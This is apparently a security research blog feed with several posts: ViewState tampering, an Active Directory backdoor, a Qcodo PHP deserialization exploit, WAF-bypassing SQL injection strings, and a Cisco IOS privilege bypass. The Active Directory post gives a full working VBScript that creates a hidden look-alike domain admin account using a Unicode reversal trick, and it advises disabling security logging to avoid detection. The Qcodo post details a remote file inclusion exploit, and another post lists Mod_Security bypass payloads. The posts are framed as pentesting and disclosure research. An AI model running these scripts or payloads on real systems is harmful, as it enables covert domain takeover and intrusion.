[Positive Technologies] Research Lab

VIEWSTATE Vulnerabilities

noreply@blogger.com (yunusov) — Fri, 27 Jan 2012 08:16:00 +0000

1. ViewState Overview
"View state is a method that the ASP.NET page framework uses to preserve page and control values between round trips. When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field or fields."
MSDN

"What does ViewState do?
- Stores values per control by key name, like a Hashtable
- Tracks changes to a ViewState value's initial state
- Serializes and deserializes saved data into a hidden form field on the client
- Automatically restores ViewState data on postbacks"
From an article on the ViewState mechanisms by an ASP.NET developer

To put it even simplier, ViewState is a hidden HTML parameter that sends a current structure of page content to the server. Example of use: retaining form field values on the page for by-page list scrolling.

Though there are widely used methods of disabling or avoiding ViewState (usually, by means of a DBMS), this mechanism is built in ASP.NET by default and is often misused:

"Even more important than understanding what it does, is understanding what it does NOT do:
What doesn’t ViewState do?
- Automatically retain state of class variables (private, protected, or public)
- Remember any state information across page loads (only postbacks)
- Remove the need to repopulate data on every request
- ViewState is not responsible for the population of values that are posted such as by TextBox controls (although it does play an important role)"
From an article on the ViewState mechanisms by an ASP.NET developer

Obviously, such misuse entails more serious problems, such as a missing filtration or a perverted idea of how the web application should work properly.
Developers tend to believe that if ViewState is a serialized structure, moreover, a base64-encrypted one, no attacker will be able to get to its contents.

However, the truth is, if the encryption and the data integrity check (MAC) are disabled, accessing the content is much simplier than it seems. Let’s decode base64:
Pic. 1. Decoding VIEWSTATE by means of base64_decoder.

Then, open it in the Hex Editor. Now it is evident that any string variable is preceded by bytes that indicate the string’s length (the number of bites depends on the length of the string: a string less than 128 bytes will have one byte for a variable length).

Pic. 2. Spoofing content of the serialized structure.

Authoritative resources state that ASP.NET versions earlier than 2.0 use LosFormatter as a serialization/deserialization algorithm, while version 2.0 and later use ObjectStateFormatter. Thus, to change the variable, one needs to define the length of a new string, overwrite the string, overwrite the byte (bytes) with the string length, encode it back with base64 and insert into __VIEWSTATE.

Pic. 3. Spoofing content of the serialized structure.

2. Vulnerabilities and attacks
Combined with a low-level knowledge of an average specialist about a correct and secure configuration of web applications, such approach generates the following vulnerabilities and provides opportunities for the following attacks:
• Cross-Site Scripting (XSS)
• Content Spoofing
• SQL Injection
• Information Leakage
• Logical Attacks
• ViewState Vulnerabilities as such
• Other vulnerabilities

2.1. Cross-Site Scripting, Content Spoofing
The possibility of content spoofing for an HTML page comes out of ViewState main purpose, i.e. to preserve page and control values. If data from ViewState placed into the HTTP response body are not filtered properly, it results in Content Spoofing and/or Cross-Site Scripting.
Vulnerable configuration:
EnableViewStateMac=false
ViewStateEncryptionMode=never|auto
(Depends on RegisterRequiresViewStateEncryption)
ViewStateUserKey=EMPTY

2.2. Information Leakage, Logical Attacks
If developer does not encrypt the VIEWSTATE parameter (Securing View State), an attacker can decode the VIEWSTATE structure and extract confidential data. If developer does not check data integrity (MAC), an attacker can change parameters that can influence the web application logic, thus facilitating Authentication Bypass, Authorization Bypass, and Abuse of Functionality.
Vulnerable configuration:
ViewStateEncryptionMode=never|auto
EnableViewStateMac=false|true

2.3. Attacks Against ViewState
The ViewState itself is also vulnerable to attacks. For example, September, 2010 saw a publication describing a vulnerability that allowed decrypting AES-encrypted ViewState by sending numerous requests to a server and tracking various error codes (http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx).
Besides, the earlier versions (1.0, 1.1) are vulnerable to the Denial Of Service (DoS) attacks (against unencrypted VIEWSTATE) and the Replay attacks (against encrypted VIEWSTATE). The latter one is an attack against a cryptographic protocol consisting in resending an intercepted package that will be received appropriately, thus breaking the algorithm. These attacks were described by Michal Zalewski as far as in 2005 (http://seclists.org/bugtraq/2005/May/27).

2.4. Other Vulnerabilities
All other vulnerabilities common for web applications, such as SQL injection, OS Commanding, as well as other vulnerabilities of such types as Code Exploitation, Information Disclosure, etc. can and should be checked both in variables of the ViewState structure and in ordinary variables sent by GET/POST/COOKIES.
Vulnerable configuration:
EnableViewStateMac=false
ViewStateEncryptionMode=never|auto
(depends on RegisterRequiresViewStateEncryption)

3. Protection

3.1. EnableViewStateMac
Default: TRUE
Since: 1.0
Enables MAC (Machine Authentication Check) to check the VIEWSTATE parameter values by means of a checksum.
Set the EnableViewStateMac property to "True" in the Page element.
Besides, the activation requires configuring the validationKey and validation properties of the machineKey element.
The following in-built encrypting algorithms are supported: SHA1, MD5, 3DES, AES, HMACSHA256, HMACSHA384, HMACSHA512.

3.2. ViewStateEncryptionMode
Default: Auto
Since: 2.0
Allows encrypting the VIEWSTATE parameter by any of the following algorithms: DES, 3DES, AES.
For activation, configure the decryptionKey and decryption properties of the machineKey element.

3.3. ViewStateUserKey
Default: EMPTY
Since: 1.1
Not everyone knows that ViewState protects not only itself against spoofing, but the entire application against CSRF by means of the ViewStateUserKey parameter.
ViewStateUserKey is just a protection mechanism. It is a developer’s duty to ensure its unpredictable and random nature.
Set the ViewStateUserKey property to "String" in the Page element.

4. Conclusion
Sections 2 and 3 provide sound evidence that, configured by default, ViewState is secured against vulnerabilities that are not 0-day. However, quite often developers, after having struggled with constantly appearing error notifications about integrity violation, faulty arguments, etc., end up disabling keys that provoke errors, thus leaving the application vulnerable to various attacks.
Yet, if the web application is properly configured, the probability of errors and even vulnerabilities can be minimized down to 0.

A Backdoor in the Next Generation Active Directory

noreply@blogger.com (Dmitry Evteev) — Mon, 23 Jan 2012 18:57:00 +0000

At the beginning of the last year, I already raised the issue of post-exploitation in a Microsoft Active Directory domain. The brought forward approach addressed the variant aimed mostly at the case of the loss of admin privileges rather than their exploitation. Additionally, the action of regaining the privileges itself involved conspicuous events and visually evident manipulations in the directory. In other words, to regain admin privileges one had to become a member of the appropriate security group, such as Domain Admins.

It should be mentioned that administrators get very nervous when suddenly they realize there is someone else in the system. Some of them rush to address the security incident horse and foot, sometimes taking most unpredictable steps;))

Now imagine how an Active Directory administrator of a large company can react when they see an unfamiliar account name in the Enterprise Admins security group. In case someone really intruded the system, the administrator’s concern is perfectly reasonable. However, in cases of improper counteraction when a pentest is taking place, it is certainly not worth worrying about (along with depriving the pentest guys of their access points and privileges gained with blood and sweat).

I spent a lot of time thinking on how, without scaring administrators, to use the privileges gained during pentest freely (especially with aggressive counteraction of administrators, as it was during my recent pentests). On the one hand, pentesters are strictly limited in their possibilities. For example, the rule of minimizing impact on the object is taken for granted. So, we cannot simply create and leave backdoors all around the network. On the other hand, there are absolutely clear goals that should be achieved before a happy administrator notices unauthorized activity and unplugs the computer.

So how can a pentester remain unnoticed in Microsoft networks?

The first thing that comes to my mind is to use an admin account. The access is legitimate, so it should not attract any special attention. However, as experience has shown, obtaining clear-text admin password is not always possible. In such cases the attack called Pass-the-Hash comes to your aid. It would be almost perfectly ok (almost, since the Pass-the-Hash type of attack narrows the possibilities of developing the attack, e.g. the RDP remote access protocol cannot be used), but in serious companies administrators gradually turn to smart cards, which do not allow conducting attacks based on the NTLM protocol faults. Ok, we still can exploit an authorized user's token (e.g., incognito) and/or a Kerberos ticket (e.g., WCE). That's as it may be, of course, but in practice Kerberos is not Kerberos and a token is not a token: available tools for conducting such types of attacks, unfortunately, are definitely lousy. Moreover, in both cases (just as in case of Pass-the-Hash), the attackers are rather limited in their actions by the protocols in use that support domain SSO.

So, the most attractive way is to exploit the privileges of, if not an existing domain admin account, then a created one with a known password...

How, while doing this, not to be spotted by an attentive eye of the domain administrator?

First, adding changes to Active Directory involves generation of certain events, about which administrators had better not know. So, before intruding a domain (of course, only as part of a pentest and only with an approval of your customer's representative) disable logging of security events on the domain controllers by using an appropriate GPO. Let me remind you that by default the time of group policies background refresh on domain controllers is 15 minutes.

Second, why not to create a visually identical account that is analogous to the existing domain admin account? To achieve it, you can, for example, use Unicode symbols (!). Then, you can set the newly created user’s attribute showInAdvancedViewOnly to TRUE, which will allow you to hide the object in the default view mode of the Manage users and computers (dsa.msc) snap-in. After that, there is one remaining step: to assign the account to an administrative group which is free from a real domain admin (as a rule, administrators just can’t help assigning their accounts to all thinkable and unthinkable administrative groups), for instance, let’s leave the admin account in the Enterprise Admins group, and put its clone into the Domain Admins group.

However, I suppose many readers are already in doubt that the campaign can be successful. And they are right! This technique is good for nothing, since it has two significant defects:
1. The created account is visible in the directory to an ‘aided eye’.
2. When searching for users in the domain, the admin account appears double.

What are the solutions to these problems?

It would seem that the simplest solution is obvious: to set the permissions on the newly created object (our account) appropriately. It is sufficient to forbid the Everyone group to read public information about the object. And in the organization unit, next to the real Active Directory admin, ‘something’ will appear, and this ‘something’ will cease to let itself be noticed in the output of domain accounts search. However, this dolce vita will last not more than 60 minutes. The thing is that by default every 60 minutes the SDPROP process runs on the domain controller which acts as a PDC emulator. The process restores access rights of some Active Directory objects (including all members of administrative groups) according to the defined permissions on the AdminSDHolder object (http://technet.microsoft.com/en-us/query/ee361593).

Unfortunately, it is impossible to disable the security mechanism by using standard functionality. A hacking attempt via exploiting permissions on the object may cause replication problems (here it starts to smell of sort of sabotage, which is inadmissible when pentesting). Changing ACLs on the AdminSDHolder object will affect many objects, including all domain admins accounts. So, as a possible feasible solution you may want to use regular running of a script which redresses the consequences of the SDPROP process actions. However, there is even a better alternative.

The SDPROP process restores ACE for specific privileged objects only, but ACEs of organization units that contain such objects remain unchanged. That is just the thing for exploitation! Using Unicode symbols you can freely create organizational units sequence analogous to the one that contains the clone account. "Correct" permissions on the parent container allow hiding it from the sharp eye of administrators (within reasonable limits, of course).

The idea of this approach is that Active Directory administrators should not develop alarming suspicions that the systems entrusted to them are compromised. They still remain valid administrators, however there is a privileged group member account which is visually identical to the AD admin account...

And one more thing. In order to avoid appearing of the doubles of the accounts when searching in the directory, you can use, for instance, the 202E symbol (my thanks to Alexander Zaitsev for reminding me this). The symbol turns over the string that follows it. So, if you create, for example, a clone for the ‘dmitry.ivanov’ account, the newly created account name will look like ‘202E’+’vonavi.yrtimd’. Perhaps this approach is not very convenient for authenticating in the system, but it helps avoid appearing in the search input.

In the aspect of security event logs, the approach also allows you to remain unnoticed for a certain period of time.

The script that automatically performs all the covered steps is available below. It includes the following customizable parameters:

strAdminsamAccountName is the account name that should be cloned,
strAdminsGroup is the privileged group to which the clone should be assigned,
strPassNewUser is the password that should be set for the newly created account.

On Error Resume Next

strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "Domain Admins"
strPassNewUser = "P@ssw0rd"

' - - -

Dim arrContainer(), i

Set objRootDSE = GetObject("LDAP://RootDSE")
strDomain = objRootDSE.Get("DefaultNamingContext")
Set objDomain = GetObject("LDAP://" & strDomain)

strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'")

If Not IsNull(strAdminsamAccountNameDN) Then

Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
Set objOU = GetObject(objAdmin.parent)

i=0
Call EnumOUs(objOU)

For j = i-1 To 0 Step -1

if strContainer="" Then
strContainer = "OU=" & arrContainer(j) & strContainer
primaryContainer = strContainer
Else
strContainer = "OU=" & arrContainer(j) & "," & strContainer
End if
Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
objOUcreate.SetInfo
Next

Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)

Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
objUserCreate.SetInfo
On Error Resume Next

objUserCreate.SetPassword strPassNewUser
objUserCreate.Put "userAccountControl", 66048
objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
objUserCreate.SetInfo
On Error Resume Next

objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
objUserCreate.SetInfo
On Error Resume Next

NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName

strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'")

If Not IsNull(strAdminsGroupDN) Then
Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
objGroup.SetInfo
objGroup.PutEx 3, "member", Array(NewUserDN)
objGroup.SetInfo
End If

OUAddAce(primaryContainer & "," & strDomain)

End If

Function SearchDN(str)
Set objConnection = CreateObject("ADODB.Connection")

objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"

Set objCommand = CreateObject("ADODB.Command")
Set objCommand.ActiveConnection = objConnection
objCommand.Properties("Searchscope") = 2

objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str
Set objRecordSet = objCommand.Execute
If Not objRecordSet.EOF Then
SearchDN = objRecordSet.Fields("distinguishedName").Value
End if
End Function

Sub EnumOUs(objChild)
Dim objParent

Set objParent = GetObject(objChild.Parent)
If (objParent.Class = "organizationalUnit") Then
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou
i=i+1
Call EnumOUs(objParent)
Else
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou & ChrW(128)
i=i+1
End If
End Sub

Function OUAddAce(OU)

Dim objSdUtil, objSD, objDACL, objAce
Set objOU = GetObject ("LDAP://" & OU)

Set objSdUtil = GetObject(objOU.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")

objAce.Trustee = "Everyone"
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
objDacl.AddAce objAce

objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo

Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
objOU.SetInfo

End Function

Intercepting Windows Printing by Modifying GDI Subsystem

noreply@blogger.com (Positive Research) — Thu, 29 Dec 2011 14:57:00 +0000

Artyom Shishkin about Windows GDI

Intercepting Windows Printing by Modifying GDI Subsystem

View more presentations from Positive Hack Days

Root via XSS

noreply@blogger.com (Positive Research) — Thu, 29 Dec 2011 14:48:00 +0000

Denis Baranov's presentations about XSS

Root via XSS

View more presentations from Positive Hack Days

How to Hack a Telecommunications Company and Stay Alive

noreply@blogger.com (Positive Research) — Wed, 14 Dec 2011 11:47:00 +0000

Sergey Gordeychik, Technical Director of Positive Technologies, presented his research work on information security of telecommunications companies at the ZeroNight conference.

How is penetration testing performed for telecom networks? What dangers to expect from subscribers? How to avoid financial losses under hacker attacks?

See his 71-slide presentation How to Hack a Telecommunications Company and Stay Alive under the cut.

How to hack a telecommunication company and stay alive. Sergey Gordeychik

View more presentations from Positive Hack Days

Positive Hack Days Forum

noreply@blogger.com (Dmitry Evteev) — Fri, 18 Nov 2011 11:02:00 +0000

PHD 2011-2012 from Positive Technologies on Vimeo.

Registration on Positive Hack Days 2012 is open - http://phdays.com/registration.asp

PHD CTF Quals opens up a team registration for the information security contests

noreply@blogger.com (Dmitry Evteev) — Mon, 14 Nov 2011 16:17:00 +0000

The coming December will see a qualification competition for PHD CTF, an international information security contest. The main contests will be held on May 30-31, 2012, in Moscow, Russia, as a part of Positive Hack Days, an international forum on information security.

This year everyone can participate in the qualification competitions: either in CTF Quals, or in CTF Afterparty. The competitions will contest participants’ skills of information security assessment, vulnerability search and exploitation, reverse engineering and hacking in general. The contest conditions will be as close to the real-life ones, as possible: vulnerabilities used for PHD CTF Quals and CTF Afterparty are not made-up but taken from the “wildlife”.

PHD CTF Quals, held on December 10-11, will identify the best teams, who will compete at the main contests on May 30-31, 2012, at the Positive Hack Days forum.

December 12-25 will carry on with individual competitions: the top participants will be awarded with diplomas and certificates from Positive Technologies and will be able to take part in the May contests at the forum.

Registration for the qualification competition is now open.

To register for PHD CTF Quals, visit http://phdays.com/smt.asp?gnum=0
To register for PHD CTF Afterparty, visit http://phdays.com/smt.asp?gnum=1

The participant registration for PHD CTF Quals and PHD CTF Afterparty is closing on November 28, 2011.

For detailed information about the competition visit the corresponding sections of our web site: www.phdays.ru.

SAP DIAG Decompress plugin for Wireshark

noreply@blogger.com (Positive Research) — Tue, 11 Oct 2011 13:55:00 +0000

SAP DIAG Plugin extends the basic functionality of the WireShark network packet analyzer and provides additional features of SAP DIAG protocol analysis. This extension allows one to collect and decompress SAP DIAG packets in the course of interaction between SAP FronTend client software and SAP application servers.

Author: Vladimir Zarichnyy (Positive Research Center)
License: AS IS

Version: 0.1b
Download URL: pt_sap_diag_wireshark_plugin.zip

Setup:

Plugin work only in Wireshark for Windows.

Installation steps: you must copy plugin pt_sap_diag_wireshark_plugin.dll in folder %WiresharkInstallDir%/plugins/%version%

In future versions:

- Open Source (GPL)

- Auto SAP account grabber (to file)

ASV Vulnerabilities

noreply@blogger.com (Denis Baranov) — Wed, 21 Sep 2011 12:27:00 +0000

When applying for a PCI DSS ASV certificate we came across a service based on the Qcodo

framework with quite an amusing vulnerability in it. The vulnerability is caused by the peculiar behavior of the PHP interpreter that occurs when deserializing inherited objects. All versions of this CMS proved vulnerable.

1) Let’s find unserialize() in the QFormBase class, in the following method:

public static function Unserialize($strPostDataState) { // Setup and Call the FormStateHandler to retrieve the Serialized Form $strLoadCommand = array(QForm::$FormStateHandler, 'Load'); $strSerializedForm = call_user_func($strLoadCommand, $strPostDataState); if ($strSerializedForm) { // Unserialize and Cast the Form $objForm = unserialize($strSerializedForm); $objForm = QType::Cast($objForm, 'QForm'); // Reset the links from Control->Form if ($objForm->objControlArray) foreach ($objForm->objControlArray as $objControl) $objControl->SetForm($objForm); // Return the Form return $objForm; } else return null; }

2) Likewise, in the same class, there is another method:

protected function Render() { require($this->HtmlIncludeFilePath); }

3) The method is called from

public static function Run($strFormId, $strAlternateHtmlFile = null) {

4) The call looks like this:

if (array_key_exists('Qform__FormId', $_POST) && ($_POST['Qform__FormId'] == $strFormId) && array_key_exists('Qform__FormState', $_POST)) { $strPostDataState = $_POST['Qform__FormState']; if ($strPostDataState) // We might have a valid form state -- let's see by unserializing this object $objClass = QForm::Unserialize($strPostDataState); // If there is no QForm Class, then we have an Invalid Form State if (!$objClass) throw new QInvalidFormStateException($strFormId); }

5) The QFormBase class definition is as follows:

abstract class QFormBase extends QBaseClass {

So, it is impossible to create an object of the QFormBase type (since the class is abstract). Moreover, there is no need to do so since the given Run method cannot be called.

6) Let’s search for a class both non-abstract and inherited from QFormBase. Such a class called Dushboard is found at /www/drafts/dashboard/index.php.

Below the class creation code, you can see the following call line:

Dashboard::Run('Dashboard');

7) To exploit the code, let’s send an encrypted serialized object in the $_POST['Qform__FormState'] parameter and specify the correct class name in the $_POST['Qform__FormId'] parameter. It should be the same name that was passed to the Run() method. In our case, it is Dashboard.

8) Not to reinvent the wheel, let’s use the encryption methods from the framework of the same version in the exploit. The QFormStateHandler::Save($strFormState, $blnBackButtonFlag) method is responsible for saving and encrypting a serialized object.

9) Let’s create an object and try to serialize it:

class Dashboard extends QForm { public function __construct() {} }

$a=new Dashboard(); $a=serialize($a); $a=QFormStateHandler::Save($a, false); echo $a;

10) Now let’s send the derived string in the appropriate parameter of a POST request. The results read:

Invalid argument supplied for foreach() In line 231: foreach ($objClass->objControlArray as $objControl) {

11) Let’s create all necessary arrays for the series of analogous errors that were revealed when developing the exploit. The resultant class is provided below:

class Dashboard extends QForm { public function __construct() { $this->objControlArray = array(); $this->objGroupingArray = array(); } }

12) Finally, we find the most curious error:

require() [function.require]: Filename cannot be empty Line 827: require($this->HtmlIncludeFilePath);

13) To prevent the linked framework from errors, you can set a value for the $this->HtmlIncludeFilePath field. This is how you do it:

require(dirname(__FILE__) . '/../includes/prepend.inc.php'); class Dashboard extends QForm { public function __construct() { $this->objControlArray = array(); $this->objGroupingArray = array(); $this->HtmlIncludeFilePath = "1.txt"; } }

$a=new Dashboard(); $a=serialize($a); $a=str_replace('s:34:"Y:\home\test2.ru\www\ASV\www\1.txt"','s:21:"http://test1.ru/i.txt"', $a); $a=QFormStateHandler::Save($a, false); echo $a;

14) The engine requires that the file being linked contain the following two lines:

$this->RenderBegin();

and

$this->RenderEnd();

Let’s add them, though it’s not necessary at all – the file executes without them just the same. These lines are used only to make the code execution results more easy-to-view. If it is possible to link only local files, you can do without these lines because in the standard error notification form, the linkup result is readable from the source code.

Real systems do not always have the Dushboard class. In this case, you can sniff any POST request and view the value of the Qform__FormId parameter. Then, just give this name to the class you created.

This vulnerability occurs because PHP when deserializing an object recopies its base class fields as well. For instance, in Java and the .NET languages a programmer has to explicitly indicate whether the basic class fields should be recovered from the serialized class (e.g. via ‘implement Serialize’ for basic classes in Java). PHP does not allow for such a field protection, which triggers vulnerabilities like the one described above.

RankMyHack.Com – Who is the coolest web hacker

noreply@blogger.com (Yuri) — Mon, 29 Aug 2011 19:39:00 +0000

Who is the coolest web hacker? Everyone who is involved in the field of information security asks this question from time to time. LulzSecurity? Anonymous? Anyone else? It seems impossible to objectively identify someone as the best one. However, a site appeared in the Net a couple weeks ago which is aimed at determining who the best hacker is indeed! This site is http://RankMyHack.com. As soon as the resource was created, information about it started spreading all over the Internet. Serious Internet sources such as New York Times mentioned this site in their pages. Numerous hackers rushed to find out who is the coolest one among them …

As for the resource – its developers allow web hackers to estimate any break-in “objectively.” For every submission of a website hack, the participant receives points. The bigger the points, the higher the participant is in the rating.

The RankMyHack.Com project also provides a feature of estimating any web site. I got interested in the functions of this chart and decided to check my own home page… The result was confusing. The points gained for “compromise” of a third-level domain home page are equal to the points gained for real compromise of a second-level domain page! This fact made me doubt the reliability of data represented in the project’s rating. Meanwhile, respected media were already publishing information about outstanding compromises of rambler.ru, google.com, narod.ru… It was decided to put everything to test.

At first, a website supersite.ucoz.lv was registered. The next step was to find out how many points a participant will receive if he/she proves a successful attack against this site.

872098 points is not bad, is it? The participant “blackfun” gained 1500000 points for “compromise” of google.com and the participant “m_script” gained 842696 points for “compromise” of rambler.ru! Ha-ha! They say that break-in of my home page is cooler than break-in of rambler.ru ! )))

Let’s register in the RankMyHack system:

After registration, it becomes possible to add a hacked site into the rating system.

For this purpose, it is required to insert the string from the [Your_Unique_Code] field into the body of the main page of the “compomised” website. That’s what we do:

Let’s check whether the code was correctly added to the web page.

Done! Now we go back to RankMyHack.com and add the “compromised” site:

The system accepts our request. However, the algorithm implementation seems to be incorrect and the system considers the website http://ucoz.lv instead of its child domain to be hacked.

Let’s look at the system rating:

Isn’t it funny that the participant “superman” managed to become the 10th in the TOP_HACKERS rating for 5 minutes? It is a good result! We decided to stop here, because it was already clear that the 1st place and international acclaim are not far off =)))

Here are some guys who have tried another way: http://pastebin.com/bq8xJPMn. The results also lead us to doubt the reliability of the RankMyHack.Com rating.

Http Parameter Contamination (more)

noreply@blogger.com (Dmitry Evteev) — Wed, 17 Aug 2011 10:32:00 +0000

To continue investigating the Http Parameter Contamination (HPC) attack, I’ve done some primitive fuzzing in the environments which had not been covered in the original research of Ivan Markovic. It must be mentioned, that I have not found out anything new. On the other hand, an interesting feature of the Python interpreter was revealed; I also got a payload exploit for conducting a denial-of-service attack against the Tomcat server:) But I won’t disclose anything else about the latter so far.

The results are presented in the figure below.

* the "\0" character means that null byte is correctly processed by the application.

The most interesting features are marked in dark red. Features which are slightly less interesting but worthy of attention are highlighted in pale red. Let’s examine these results in details.

The specifics of how incoming data is processed by an ASP web-application are the most valuable feature for an attacker. The thing is that an ASP application simply deletes the "%" character in the parameter name or parameter value if the character does not make a legal character when decoding a URL. This feature allows easy bypassing of different security filters and Web Application Firewall which are applied before the application processes the incoming data. In his survey, Ivan Markovic brings the example of how the Mod_Security rules are bypassed when exploiting the Path traversal vulnerability:

http://192.168.2.105/test.asp?file=.%./bla.txt

MSSQL DBMS and the SQL Injection vulnerabilities which have been revealed in the application are more applicable to the IIS platform. By using this method, this vulnerability can be exploited in the same way in bypass of the relevant Mod_Security rules:

?id=1;selec%t+@%@version--
?id=1;selec%t+convert(int,(selec%t+table%_name+from(selec%t+row_number()+over+(order+by+table%_name)+as+rownu%m,table%_name+from+information_schema.tables)+as +t+where+t.rownu%m=1))--
...

It must be noted here, that this refers to bypassing the base rules of Mod_Security. If extended rules (optional or experimental) are used, this trick will not work.

Other specific features of data processing which are as useful as the feature described above refer to the PHP interpreter. These are the implicit conversion of types (?param[]=123 -> param=Array) which is well-known to anyone and also the control over the $_SERVER["argv"] (?1+2) array when the "on" value is set in the "register_argc_argv" configuration. The attacker may use the first specific feature of PHP to bypass various restrictions (for example, when the variables are compared implicitly) as well as to force an error message to be displayed (for example, accessing the root directory of a web server). Another specific feature of PHP allows running a script form the web server and deliver the parameters which the script receives from the command line.

The substitution of the “+", ".", "[" characters and "space" for the underscore character ("_") is a slightly less interesting feature of PHP. Why this feature brings less damage? The thing is that PHP behaves in this way only when the web server receives parameter names rather than the values of these parameters. This fact significantly reduces the chance that this feature will be used in practice.

And the last thing I want to draw your attention to is the Python interpreter. Fuzz testing revealed that when Python detects characters of the %80-%FF range, it returns an error (disclosure, etc.)):

(Appendix)
I used these scripts for testing.

PHP:

$G = &$_GET;
foreach ($G as $k=>$v)
{
print $k."=".$v;
}
?>

ASP:
<%
for each var in Request.QueryString
Response.Write ( var & "=" & Request.QueryString ( var ) )
next
%>

JAVA:
<%
java.util.Enumeration names = request.getParameterNames();
while(names.hasMoreElements()){
String keyx = names.nextElement().toString();
out.println(keyx + "=" + request.getParameter(keyx)); }
%>

PERL:
use CGI;
my $cgi = new CGI;
my @params = $cgi->param();
print <
HTTP/1.0 200 OK
Content-Type: text/html

ENDOFTEXT
foreach my $parameter (sort @params) {
print $parameter."=".$cgi->param($parameter);
}

PYTHON:
import cgi, os

print ('Status: 200 OK')
print ('Content-type: text/html; charset=utf-8;')
print("")

query = os.environ.get('QUERY_STRING')

pairs = cgi.parse_qs( query )

for key, value in pairs.items():
print (key,value)

PenTest Magazine August Issue

noreply@blogger.com (Dmitry Evteev) — Thu, 11 Aug 2011 12:25:00 +0000

Positive Hack Days material win the world – now there is an article in August issue of PenTest Magazine completely devoted to cloud computing and prepared by Sergey Gordeychik, CTO of Positive Technologies and Yuri Goltsev, penetration testing expert.

{AB}Use their clouds

Annotation from the magazine:

Penetration testing can benefit of cloud computing to improve the business model for resource intensive tests. The flexibility and cost effectiveness of the IaaS model can be used for resource greedy activities as brute forcing or denial-of-service tests.

The article is based on {AB}Use Their Clouds presentation presented by Sergey Gordeychik on Positive Hack Days.

The article is about practical usage of cloud computing in daily routing of a penetration tester. It includes rainbow tables for offline password bruteforce with examples and costs to implement password bruteforce based on widely known encryption algorithms. The article also includes basics of network services on cloud computing such as distributed network scanning service (IDS bypass), fault tolerance testing service, public data gathering service. Special attention is paid to fault tolerance service as now it is a very actual question. The article touches upon clouds provider confidence, appropriate software and reaction to abuses.

More Cisco, "more" vulnerability

noreply@blogger.com (Positive Research) — Tue, 12 Jul 2011 07:58:00 +0000

Positive Research has discovered a vulnerability in Cisco devices. The vulnerability allows attackers to bypass certain access restrictions.
A possible security flaw was detected because of privileged command restrictions, in particular – "more" command that allows attackers to obtain router configuration stored in nvram, system (RAM), flash elements.
If more command access settings are configured as privilege exec level {number} more, opposed to commands like show, disk element access is propagated to all lower levels that could allow unauthorized users to obtain router memory and its elements nvram, system (RAM), flash.
Such problems are detected for IOS routers and switchers 12.2, 12.3, 12.4, 15.0.

Details

IOS 12.2, 12.3 limit access to configuration that can be obtained from system:running-config, but prevent reading directly from router memory (system:memory) to get the data, also reading from configuration and other files in router’s flash and nvram can is not limited.
IOS 12.4, 15.0 opposed to versions 12.2, 12.3, do not limit access from all router’s elements nvram, system (RAM), flash.
More details and how to fix are available here: http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtk17827

Example 1. How to get configuration
Cisco 3550-12T (12.2(50)SE)
C3550 Software (C3550-IPSERVICESK9-M), Version 12.2(50)SE)

Device configuration:

!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
…
!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end

"show" command (low level privileges):

C3550#show running-config
^
% Invalid input detected at '^' marker.

C3550#show startup-config
^
% Invalid input detected at '^' marker.

"more" command (low level privileges):

C3550#more flash:config.text
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
enable secret 5
!
username ptuser privilege 3 password 7
aaa new-model
…
!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end

So in spite the fact that device configuration access via show command is restricted, an attacker can get the configuration via "more" command.

Example 2

C3550#more nvram:startup-config
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
enable secret 5
!
username ptuser privilege 3 password 7
aaa new-model
…
!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end

C3550#more system:?
